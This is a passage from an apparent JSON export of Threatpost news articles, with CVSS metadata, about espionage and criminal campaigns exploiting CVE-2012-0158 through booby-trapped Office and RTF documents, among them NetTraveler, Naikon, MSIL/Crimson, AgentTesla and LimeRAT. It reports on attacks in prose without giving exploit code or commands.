program](<https://threatpost.com/always-outmanned-always-outgunned/>), Edward Snowden, the former NSA contractor responsible for the leaks, and the CIA. Once the malicious Word document is opened on a target machine, it writes several files to the hard drive, including one named \u201cdw20.exe\u201d, which has been seen in use by the NetTraveler crew in the past. Dixon said he wasn\u2019t able to identify the IP address or command and control server associated with the email campaign, but he believes there are likely additional emails out there like the one he found.\n\n\u201cWhatever the domain or IP address used in the attack is, you can be sure that there will be other emails and malicious documents like it. The NetTraveler attackers have been going strong since the early 2007-2008\u2032s and I doubt they will be stopping anytime soon,\u201d Dixon said.\n\nKurt Baumgartner, a security researcher at Kaspersky Lab who did some of the original research on the NetTraveler campaign, said the group behind the attacks is oddly incautious in its tactics.\n\n\u201cThese groups are surprisingly bold. Not only did we see this group maintain backdoors on their victim systems alongside Red October backdoors, but the NetTravler infrastructure continues to be in active use even after the operation has moved out of the shadows and into the public light,\u201d he said.\n\n_Image from Flickr photos of [LadyDragonflyCC](<https://secure.flickr.com/photos/ladydragonflyherworld/>). _\n", "cvss3": {}, "published": "2013-06-18T10:00:42", "type": "threatpost", "title": "NetTraveler Attackers Using PRISM Program as Bait", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2018-03-22T14:58:21", "id": "THREATPOST:849E78B2F5C0D699337829FD6D6F8AE4", "href": "https://threatpost.com/nettraveler-attackers-using-nsa-prism-program-as-bait/101006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:15", "description": "[](<https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/>)Exploits embedded inside Microsoft Office documents such as Word, PDFs and Excel spreadsheets have been at the core of many targeted attacks during the past 24 months. Detection of these attack methods is improving and nimble hackers are recognizing the need for new avenues into enterprise networks. Some have been finding success using rich text format (RTF) files to spread malware that exploits Office vulnerabilities.\n\nResearcher Mila Parkour reported in June she\u2019d collected 90 RTF files over the course of three months, many with China-related file names and many [targeting specific industries](<http://contagiodump.blogspot.com/2012/06/90-cve-2012-0158-documents-for-testing.html>). All of them were exploiting [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>), a [vulnerability in Active X controls within MSCOMCTL.OCX](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>)\u2013OLE files developed by Microsoft to allow object linking and embedding to documents and other files. Successful exploits allow remote attackers to execute code over the Web, Office docs, or RTF files.\n\n\u201cMany believe RTF is a relatively safe format, just as it was back in the day when people might not trust Word docs and would send PDFs around instead. Today, we chuckle at that,\u201d said Lenny Zeltser, a handler at the SANS Internet Storm Center. \u201cToday, Word and PDF documents are risky and people are sending RTF files. We can now see attackers finding ways to use RTF files in exploits.\u201d\n\nSome of the samples in the wild have been fairly sophisticated and difficult to examine, Zeltser said. Some, for example, have contained embedded portable executable files that are a challenge to find and extract without some heavy manual lifting. German security researcher Frank Boldewin, keeper of the [OfficeMalScanner toolkit](<http://reconstructer.org/main.html>), is among those recognizing this new trend. He updated the popular, freely available tool with RTFScan that can help identify RTF-based exploits and extract embedded artifiacts for examination.\n\n\u201cThe tool is fantastic for analyzing malicious RTF files,\u201d Zeltser said. \u201cAttackers are using more sophisticated ways of concealing artifacts in RTF files, which makes them harder to examine. The tool is designed to help a trained security analyst figure out the nature of the file, and if it\u2019s exploited, what happens next.\u201d\n\nIn one example posted on the ISC Diary today,[ RTFScan was able to find an embedded OLE object](<https://isc.sans.edu/diary/Analyzing+Malicious+RTF+Files+Using+OfficeMalScanner+s+RTFScan/14092>) that included the attacker\u2019s shellcode that would be executed by a vulnerable Word doc, Zeltser wrote. RTFScan was able to get around the obfuscation in place and extract the malicious embedded executable.\n\n\u201cRTFScan tells you where to find the shellcode, extract it and turn it into a Windows executable,\u201d he said. \u201cThis would allow an analyst to debug it and observe what happens after it executes, how the malware behaves. This is very important for analysts because the frequency of using Microsoft Office docs continues to be very common. The number of attacks is not shrikning and attackers find all sorts techniques to deliver payloads delivered with the help of Word, PDF, Excel and now RTF documents.\u201d\n", "cvss3": {}, "published": "2012-09-14T17:25:21", "type": "threatpost", "title": "Tool Scans for RTF Files Spreading Malware in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-04-17T16:31:32", "id": "THREATPOST:A617AB8E3147511D6E87F9782597BB64", "href": "https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/77014/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:42", "description": "Diplomats and military personnel in India have been victimized in targeted espionage attacks that use a number of means of infection including phishing and watering hole sites.\n\nResearchers at Proofpoint this week published a report on [Operation Transparent Tribe](<https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf>), which was ongoing as of Feb. 11 when Proofpoint uncovered live attacks against Indian diplomats operating in embassies in Saudi Arabia and Kazakhstan. Proofpoint found IP addresses in Pakistan involved in the attacks, which involved an elaborate network of watering hole websites and multiple phishing email campaigns.\n\nThe sustained campaign\u2019s goal, Proofpoint said, was designed to allow attackers to drop a remote access Trojan it calls MSIL/Crimson. The Trojan had a variety of data exfiltration functions, including access to laptop cameras, screen capture functionality and keylogging.\n\nKevin Epstein, VP of threat operations center at Proofpoint told Threatpost that uncovering nation-state cyber espionage is one thing, but being able to expose it as it is happening is rare.\n\n\u201cThis is a multi-year and multi-vector campaign clearly tied to state sponsored espionage,\u201d he said. \u201cIn the world of crimeware, you rarely see this type of complexity. A nation state using multiple vectors, that\u2019s significant.\u201d\n\nHacking has become an increasingly popular and effective weapon in geopolitical conflicts, Epstein said. Groups with ties to most major powers are increasingly using targeted attack campaigns for political and competitive advantage and as a way to perpetrate attacks on critical infrastructure.\n\nEpstein said that typically security analysts only get wind of past campaigns that offer limited insight into pieces of the attack puzzle. With this recent discovery, he said, Proofpoint was able to identify all aspects of the campaign as it was being carried out.\n\n\u201cThis was an elaborate advanced persistent threat that required setting up multiple websites, multiple registrations, a build-out of full content sites and hosting sites,\u201d Epstein said.\n\nOne attack vector include email attachments that included weaponized RTF documents utilizing the four-year-old [CVE-2012-0158 Microsoft ActiveX vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) that dropped an embedded, encoded portable executable.\n\n\u201cMSIL/Crimson is a logical extension of existing malware. This discovery is less about the bits and bytes of a specific malware,\u201d Epstein said.\n\nMSIL/Crimson, Epstein said, is a stealthy package of exploits. After successful exploitation and decoding of the embedded payload, MSIL/Crimson will be executed on the victim\u2019s machine. The first stage in infection is a downloader whose purpose is to download the more fully featured remote access Trojan component, he said.\n\nOther attack vectors for MSIL/Crimson included fake blogs and news websites that contained links to malicious payloads via text and image hyperlinks and desirable files that contained MSIL/Crimson.\n\n\u201cThese were sites that generated content that was designed to interest people in the armed forces,\u201d Epstein said. \u201cThe attackers used topical and original content compelling enough to entice readers to share stories, links and downloads with others in the armed services.\u201d\n\nIn Proofpoint\u2019s analysis of the MSIL/Crimson it wrote: \u201cMany of the campaigns and attacks appear related by common IOCs, vectors, payloads, and language, although the exact nature and attribution associated with this advanced persistent threat remains under investigation.\u201d\n", "cvss3": {}, "published": "2016-03-04T17:35:42", "type": "threatpost", "title": "Proofpoint Warns Of New MSIL/Crimson Tied To Cyber Espionage", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2016-03-10T14:44:44", "id": "THREATPOST:0B96DF7B8D0B80F9F8340D753646049C", "href": "https://threatpost.com/espionage-malware-watering-hole-attacks-target-diplomats/116600/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:14", "description": "Chinese president Xi Jinping is supposed to have dinner this evening with U.S. president Barack Obama. Wonder if the name Ge Xing will come up?\n\nGe Xing is the subject of a joint [report](<http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf?t=1443030820943&submissionGuid=81f1c199-859f-41e9-955b-2eec13777720>) published this morning by ThreatConnect and Defense Group Inc., computer and national security service providers respectively. Ge is alleged to be a member of the People\u2019s Liberation Army unit 78020, a state-sponsored hacking team whose mission is to collect intelligence from political and military sources to advance China\u2019s interests in the South China Sea, a key strategic and economic region in Asia with plenty of ties to the U.S.\n\nThe report connects PLA 78020 to the Naikon advanced persistent threat group, a state-sponsored outfit that has followed the APT playbook to the letter to infiltrate and steal sensitive data and intellectual property from military, diplomatic and enterprise targets in a number of Asian countries, as well as the United Nations Development Programme and the Association of Southeast Asian Nations (ASEAN).\n\nControl over the South China Sea is a focal point for China; through this region flows trillions of dollars of commerce and China has not been shy about claiming its share of the territory. The report states that China uses its offensive hacking capabilities to gather intelligence on adversaries\u2019 military and diplomatic intentions in the regions, and has leveraged the information to strengthen its position.\n\n\u201cThe South China Sea is seen as a key geopolitical area for China,\u201d said Dan Alderman, deputy director of DGI. \u201cWith Naikon, we see their activity as a big element of a larger emphasis on the region and the Technical Reconnaissance Bureau fitting into a multisector effort to influence that region.\u201d\n\nThe report is just the latest chess piece hovering over Jinping\u2019s U.S. visit this week, which began in earnest yesterday with a visit to Seattle and meetings with giant technology firms such as Microsoft, Apple and Google, among others. Those companies want to tap into the growing Chinese technology market and the government there is using its leverage to get them to support stringent Internet controls imposed by the Chinese government.\n\nA letter sent to American technology companies this summer, a _[New York Times](<http://www.nytimes.com/2015/09/17/technology/china-tries-to-extract-pledge-of-compliance-from-us-tech-firms.html>)_ report last week, said that China would ask American firms to store Chinese user data in China. China also reportedly asked U.S.-built software and devices sold in China to be \u201csecure and controllable,\u201d which likely means the Chinese would want backdoor access to these products, or access to private encryption keys.\n\nJinping, meanwhile, tried to distance himself from the fray when he said in a _Wall Street Journal _interview: \u201cCyber theft of commercial secrets and hacking attacks against government networks are both illegal; such acts are criminal offences and should be punished according to law and relevant international conventions.\u201d\n\n_Journal_ reporter [Josh Chin connected with Ge Xing over the phone](<http://www.wsj.com/articles/cyber-sleuths-track-hacker-to-chinas-military-1443042030>) and Ge confirmed a number of the dots connected in the report before hanging up on the reporter and threatening to report him to the police. While that never happened, the infrastructure connected to Ge and this slice of the Naikon APT group, was quickly shut down and taken offline.\n\nIn May, researchers at Kaspersky Lab published a report on [Naikon](<https://securelist.com/analysis/publications/69953/the-naikon-apt/>) and documented five years of activity attributed to the APT group. It describes a high volume of [geo-politically motivated attacks](<https://securelist.com/blog/research/70029/the-naikon-apt-and-the-msnmm-campaigns/>) with a high rate of success infiltrating influential organizations in the region. The group uses advanced hacking tools, most of which were developed externally and include a full-featured backdoor and exploit builder.\n\nLike most APT groups, they craft tailored spear phishing messages to infiltrate organizations, in this case a Word or Office document carrying an exploit for CVE-2012-0158, a favorite target for APT groups. The vulnerability is a buffer overflow in the ActiveX controls of a Windows library, MSCOMCTL.OCX. The exploit installs a remote administration tool, or RAT, on the compromised machine that opens a backdoor through which stolen data is moved out and additional malware and instructions can be moved in.\n\nChin\u2019s article describes a similar attack initiated by Ge, who is portrayed not only as a soldier, but as an academic. The researchers determined through a variety of avenues that Ge is an active member of the military, having published research as a member of the military, in addition to numerous postings to social media as an officer and via his access to secure locations believed to be headquarters to the PLA unit\u2019s technical reconnaissance bureau.\n\n\u201cDoing this kind of biopsy, if you will, of this threat through direct analysis of the technical and non-technical evidence allows us to paint a picture of the rest of this group\u2019s activity,\u201d said Rich Barger, CIO and cofounder of ThreatConnect. \u201cWe\u2019ve had hundreds of hashes, hundreds of domains, and thousands of IPs [related to PLA unit 78020]. Only looking at this from a technical lens only gives you so much. When you bring in a regional, cultural and even language aspect to it, you can derive more context that gets folded over and over into the technical findings and continues to refine additional meaning that we can apply to the broader group itself.\u201d\n\nThe report also highlights a number of operational security mistakes Ge made to inadvertently give himself away, such as using the same handle within the group\u2019s infrastructure, even embedding certain names in families of malware attributed to them. All of this combined with similar mistakes made across the command and control infrastructure and evidence pulled from posts on social media proved to be enough to tie Ge to the Naikon group and elite PLA unit that is making gains in the region.\n\n\u201cIf you look at where China is and how assertive they are in region, it might be a reflection of some of the gains and wins this group has made,\u201d Barger said. \u201cYou don\u2019t influence what they\u2019re influencing in the region if you don\u2019t have the intel support capabilities fueling that operational machine.\u201d\n", "cvss3": {}, "published": "2015-09-24T13:37:36", "type": "threatpost", "title": "China PLA Unit 78020 Cyberespionage Naikon APT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2015-09-25T13:01:29", "id": "THREATPOST:9CD19A6A1B939482B336348DA5D2F47C", "href": "https://threatpost.com/naikon-apt-group-tied-to-chinas-pla-unit-78020/114798/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-15T20:07:18", "description": "Recent malware campaigns reveal that cybercriminals aren\u2019t sparing healthcare firms, medical suppliers and hospitals on the frontlines of the coronavirus pandemic.\n\nResearchers have shed light on two recently uncovered malware campaigns: one targeting a Canadian government healthcare organization and a Canadian medical research university, and the other hitting medical organizations and medical research facilities worldwide.\n\nThe emails sent to these unnamed organizations purported to send COVID-19 medical supply data, critical corporate communications regarding the virus or coronavirus details from the World Health Organization (WHO) \u2013 but actually aimed to distribute ransomware, infostealer malware and more.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThese recent campaigns are the tip of the iceberg when it comes to cybercrime targeting organizations in the healthcare space, researchers said. \u201cDespite prior reporting by various sources indicating that some cyber-threat attacker activity may subside in some respects during the COVID-19 pandemic, Unit 42 has observed quite the opposite with regard to COVID-19 themed threats, particularly in the realm of phishing attacks,\u201d said Adrian McCabe, Vicky Ray and Juan Cortes, security researchers with Palo Alto Networks\u2019 Unit 42 team, [in a Tuesday post.](<https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/>)\n\n**Ransomware Attacks**\n\nBetween March 24 \u2013 30, researchers observed various malicious emails attempting to spread ransomware to several individuals associated with an unnamed Canadian government health organization actively engaged in COVID-19 response efforts, as well as a Canadian university that is conducting COVID-19 research.\n\nThe emails, sent from a spoofed WHO email address (noreply@who[.]int), contained a rich text format (RTF) file that purported to spread information about the pandemic. When opened, the RTF file attempted to deliver a ransomware payload that exploits a known vulnerability ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>)) in Microsoft Office, which allows attackers to execute arbitrary code.\n\nWhen opened, the malicious attachment dro[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/14112324/Figure-3.-Ransomware-notification-image-1.png>)ps a ransomware binary to the victim\u2019s disk and then executes it. To avoid detection, the dropped binary has a hidden attribute set, which is used when some content is obsolete and no longer necessary, to completely hide details from the user. The binary also uses an Adobe Acrobat icon to further cloak its true purpose.\n\nAfter further analysis of the code structure of the binary and the host-based and network-based behaviors, researchers determined that the malware is an open-source [ransomware variant called EDA2](<https://threatpost.com/criminals-peddling-affordable-alphalocker-ransomware/117888/>), which is associated with a larger, parent ransomware family called [HiddenTear.](<https://threatpost.com/low-cost-ransomware-service-discovered/125017/>)\n\nAfter execution, the victim receives a ransomware infection notification display on their desktop, which states: \u201cIf you want to unlock your files you must sent .35 BTC [Bitcoin] to this address,\u201d and then gives an address for where to send the ransom payment. The ransomware binary then encrypts various files extensions, including \u201c.DOC\u201d, \u201c.ZIP\u201d, \u201c.PPT\u201d and more. Of note, \u201cthis ransomware binary has a particularly substantial limitation; it is hardcoded to only encrypt files and directories that are on the victim\u2019s desktop,\u201d said researchers.\n\nResearchers said the ransomware samples in this campaign weren\u2019t successful in reaching their intended victims. Other targets haven\u2019t been so lucky, however. Despite ransomware gangs [recently pledging that they would stop](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-to-stop-attacking-health-orgs-during-pandemic/>) attacking hospitals in the midst of the pandemic, cyberattacks continue. Several hospitals have been targeted by the Ryuk ransomware, [according to security researcher \u201cPeterM\u201d on Twitter](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1243166479903834112&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost.php%3Fpost%3D154768%26action%3Dedit>).\n\n> I can confirm that [#Ryuk](<https://twitter.com/hashtag/Ryuk?src=hash&ref_src=twsrc%5Etfw>) ransomware are still targeting \nhospitals despite the global pandemic. I'm looking at a US health care provider at the moment who were targeted overnight. Any HC providers reading this, if you have a TrickBot infection get help dealing with it ASAP.\n> \n> \u2014 PeterM (@AltShiftPrtScn) [March 26, 2020](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112?ref_src=twsrc%5Etfw>)\n\nHammersmith Medicines Research, a London-based healthcare provider that was working with the British government to test COVID-19 vaccines, was also [recently hit by a ransomware attack](<https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus>). The Maze ransomware operators, which launched the attack, later posted the stolen data online.\n\n**Malware Attacks**\n\nUnit 42 researchers also spotted a separate campaign targeting various organizations, including medical organizations and medical research facilities located in Japan and Canada, with the [AgentTesla malware](<https://threatpost.com/malware-steals-info-with-advanced-obfuscation/150280/>).\n\nOther firms targeted by this malware include a United States defense research entity, a Turkish government agency managing public works, a German industrial manufacturing firm, a Korean chemical manufacturer, and medical organizations/research facilities located in Japan and Canada (all unnamed).\n\nThe malspam emails used the coronavirus as a lure, with a malicious attachment pretending to be a \u201cCOVID-19 Supplier Notice\u201d or a \u201cCorporate advisory\u201d for coronavirus.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/14112408/covid-19-malspam-liquidroam.png>)\n\nThe email address sending the malspam emails, \u201cShipping@liquidroam[.]com,\u201d uses a legitimate business domain for LiquidRoam, which provides sales of electric skateboards. This led researchers to conclude that the domain has been compromised and that the infrastructure is being used by cybercriminals.\n\nThe attachments for the emails were actually droppers delivering variants of the AgentTesla malware family. AgentTesla,[ an info-stealing malware](<https://threatpost.com/advanced-obfuscation-info-stealing-campaign/152468/>) which has been around since 2014, is sold in multiple forums commonly visited by cybercriminals, and is one of the top malware families of choice of the SilverTerrier threat actor, known for business email compromise (BEC) campaigns.\n\n\u201cAll the associated samples connected to the same C2 domain for exfiltration: \u2018ftp[.]lookmegarment[.]com,'\u201d researchers said. \u201cOur analysis also shows that the AgentTesla samples had hard-coded credentials used to communicate with the C2 over FTP.\u201d\n\nAttackers continue to leverage [coronavirus-themed cyberattacks](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) as panic around the global pandemic continues \u2013 including[ malware attacks](<https://threatpost.com/coronavirus-propagate-emotet/152404/>), booby-trapped URLs and credential-stuffing scams.\n\n\u201cIt is clear from these cases that the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are on the front lines and responding to the pandemic on a daily basis,\u201d said Unit 42 researchers.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-14T16:07:07", "type": "threatpost", "title": "Cyberattacks Target Healthcare Orgs on Coronavirus Frontlines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2020-04-14T16:07:07", "id": "THREATPOST:FF75AF79B23F8B0D0CF546FC055B7911", "href": "https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:59:07", "description": "Hold off on the notion that [watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/77647>) may supplant [phishing as the initial means of compromise](<http://threatpost.com/spear-phishing-remains-preferred-point-entry-targeted-persistent-attacks-113012/77267>) in advanced attacks. A number of recent targeted campaigns have used the crash of Malaysia Airlines 370 as a lure to infect government officials in the U.S. and Asia-Pacific.\n\nFireEye today published research on a number of [spear phishing attacks](<http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html>) that contained either infected attachments or links to malicious websites. One Chinese group, [admin@338](<http://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022>), has been active in the past targeting international financial firms that have expertise in analyzing global economic policies. Two days after flight 370 was reported missing, a spear phishing email was sent to government officials in Asia-Pacific, FireEye said, with an attachment referring to the missing airliner.\n\nUsers who clicked on the attachment saw a blank document, while in the background a variant of the Poison Ivy Trojan was installing and eventually established a backdoor to www[.]verizon[.]proxydns[.]com. This group has used both Poison Ivy and this domain in previous attacks, FireEye said.\n\nPoison Ivy has some miles on it, but security researchers say hacker groups, in particular some with ties to China, continue to make use of it. The malware is a remote access Trojan that allows attackers to not only set up backdoor communication with infected machines, but push additional malicious code, steal documents and system information, and pivot internally.\n\nFireEye said it monitored a second attack from the admin@338 group which targeted a \u201cU.S.-based think tank\u201d on March 14. The malicious attachment pretended to be a Flash video related to the missing plane and attached a Flash icon to the executable, researchers said.\n\nThis version of Poison Ivy connected to its command and control at dpmc[.]dynssl[.]com:443 and www[.]dpmc[.]dynssl[.]com:80, FireEye said, adding that the phony Verizon domain used in the first attack also resolved to an IP used by this attack as well.\n\nAdmin@338 is not the only hacker group using the Malaysia tragedy to its advantage. On March 9, a malicious executable disguised as a PDF connected to a command and control server at net[.]googlereader[.]pw:443. The victim is shown a phony PDF purporting to be a CNN story about the disappearance of the flight.\n\nThree more samples were detected that used a Word document, or an executable, disguised as a .DOC extension, dropping an exploit for CVE-2012-0158 used in the [IceFog](<http://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417>), [NetTraveler](<http://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865>) and [Red October APT](<http://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/77397>) campaigns reported by Kaspersky Lab. All of these exploits behaved similarly, targeting high-value victims with backdoor connections.\n", "cvss3": {}, "published": "2014-03-25T16:04:54", "type": "threatpost", "title": "Malaysia Airlines Flight 370 spear phishing emails spotted", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-03-26T12:21:21", "id": "THREATPOST:ACF4961C0305F2447E96F09C6C460079", "href": "https://threatpost.com/mh-370-related-phishing-attacks-spotted-against-government-targets/105024/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-09T11:23:58", "description": "Researchers have discovered a fresh campaign using Excel files to spread LimeRAT malware \u2013 making use of the hardcoded, VelvetSweatshop default password for encrypted files.\n\n[LimeRAT](<https://github.com/NYAN-x-CAT/Lime-RAT>) is a full-featured remote access tool/backdoor that can allow attackers to access an infected system and install a range of malware strains, like ransomware, cryptominers, keyloggers or botnet clients.\n\nIn the observed campaign, threat actors are creating read-only Excel files containing a LimeRAT payload. Typically in malspam scenarios involving Excel files, the files are encrypted and the recipient would need to use a password to decrypt the file. That password is usually included by an attacker in the body of a socially engineered email.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe new attack however, uses a different tack\u2014it sends malicious, encrypted Excel files using \u201cread-only\u201d mode, according to Mimecast Threat Center\u2019s Matthew Gardiner.\n\n\u201cThis campaign is notable because it shows off how cybercriminals are continuing to build on \u2018old\u2019 underlying techniques to deliver exploits, even ones that companies are well aware exist,\u201d Gardiner told Threatpost.\n\nTo decrypt any given encrypted Excel file, Excel first tries to use an embedded, default password, \u201cVelvetSweatshop,\u201d to decrypt and open the file and run any onboard macros or other potentially malicious code. At the same time, it keeps the file in read-only mode, the researcher explained, writing in a Tuesday [blog post](<https://www.mimecast.com/blog/2020/03/velvetsweatshop-microsoft-excel-spreadsheet-encryption-rises-again-to-deliver-limerat-malware/>) about the research.\n\nIf Excel fails to decrypt the file using the \u201cVelvestSweatshop\u201d password, the app will request that the user insert a password. However, in read-only mode, this step is skipped, Gardiner said \u2013 and therein lies the new campaign\u2019s threat.\n\n\u201cThe Microsoft Office system will not generate any warning dialogs other than noting the file is read-only,\u201d he wrote in the post. \u201cUsing this read-only technique, the attacker can reap the obfuscation benefits of file encryption without requiring anything further from the user, taking away one step required of the intended victim for exploitation to occur.\u201d\n\nThis makes it even easier for unsuspecting victims to open them and spread malware.\n\n\u201cThis new research demonstrates that making an Excel file read-only \u2014 as opposed to locking it \u2014 encrypts the file without the need for an external created password to open it, making it easier to fool a victim into installing the malware,\u201d wrote Gardiner.\n\nIn the current campaign, Mimecast researchers also said that the cybercriminals used \u201ca blend of other techniques in an attempt to fool anti-malware systems by encrypting the content of the spreadsheet hence hiding the exploit and payload,\u201d Gardiner added.\n\nThe hardcoded password is a well-known issue addressed in 2012 (CVE-2012-0158) that was also [presented at Virus Bulletin](<https://nakedsecurity.sophos.com/2013/04/11/password-excel-velvet-sweatshop/>) in 2013. Mimecast said it has notified Microsoft that the vulnerability is once again being used.\n\n\u201cThe VelvetSweatshop technique has developed continuously to be leveraged as an underlying capability for attacks that can be more targeted and more sophisticated, thus making spear-phishing more successful,\u201d Gardiner told Threatpost \u201cThere does not appear to be a change or fix from Microsoft in the works. In that case, in order to improve defenses against this method, organizations must use more sophisticated anti-malware technology to monitor traffic and train users to be more cyber-aware.\u201d\n\nMicrosoft Office applications like Excel files are a popular means for malware delivery due to their widespread use and recognizability, according to Mimecast. \u201cCertainly, few are ever surprised to receive invoices or financial spreadsheet attachments via email,\u201d Gardiner wrote.\n\nIt\u2019s unlikely that LimeRAT will be the only payload distributed using this tactic: \u201cOf course, given the general capability inherent with this Excel-based malware delivery technique, any type of malware is a good candidate for delivery, so Mimecast researchers expect to see it used in many more malicious phishing campaigns in the future,\u201d Gardiner observed.\n\nTo avoid being the victim of such an attack, Mimecast recommended close scrutiny of all emails with files attached, as well as, on an administrative level, monitoring network traffic for outbound connections to likely command-and-control (C2) services. Also, continuously updating endpoint security systems to bolster detection of malware loading or running on the host also can mitigate attacks, Mimecast said.\n\nThe danger is of course exacerbated by the [work-from-home (WFH) phenomenon](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>) that\u2019s emerged in the wake of the COVID-19 pandemic.\n\n\u201cWhat\u2019s old is new again, as is the case with this latest campaign leveraging the LimeRAT trojan embedded within Excel files,\u201d Tal Zamir, CTO and co-founder at Hysolate, said in an emailed comment. \u201cThe challenge, however, is that many of us are now working from home; our guard may be down, we may be juggling everything from our jobs to teaching our kids from home, and trying to stay in touch with friends and family during these challenging times. Given this, it\u2019s highly likely that we\u2019re managing the majority of these communications \u2013 email, file sharing, web conferencing, etc. \u2014 all from the same laptop \u2014 which is no longer sitting behind our corporate firewalls, IDS/IPS, or other protections that would normally be in place when working from our corporate offices.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-31T17:14:38", "type": "threatpost", "title": "8-Year-Old VelvetSweatshop Bug Resurrected in LimeRAT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2020-03-31T17:14:38", "id": "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "href": "https://threatpost.com/velvetsweatshop-bug-resurrected-limerat/154310/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:01:15", "description": "A series of targeted attacks are continuing to bully a signed Nvidia application into dropping a backdoor that lets attackers root their way through the systems of Tibetan sympathizers.\n\nAccording to [Sophos\u2019 Gabor Szappanos](<http://nakedsecurity.sophos.com/2013/02/27/targeted-attack-nvidia-digital-signature/>), the multifaceted attack can install a backdoor on unsuspecting users\u2019 machines to siphon off system information, including the computer\u2019s name and OS version along with other bits of sensitive information.\n\nFirst the campaign makes use of an old Microsoft Office vulnerability (CVE-2012-0158) that\u2019s been [used in multiple exploit vectors over the last six months](<https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/>). The vulnerability primarily exploits rich text file (RTF) documents to distribute malware and gained popularity last month when it was announced it was one of four exploits [used in the Red October 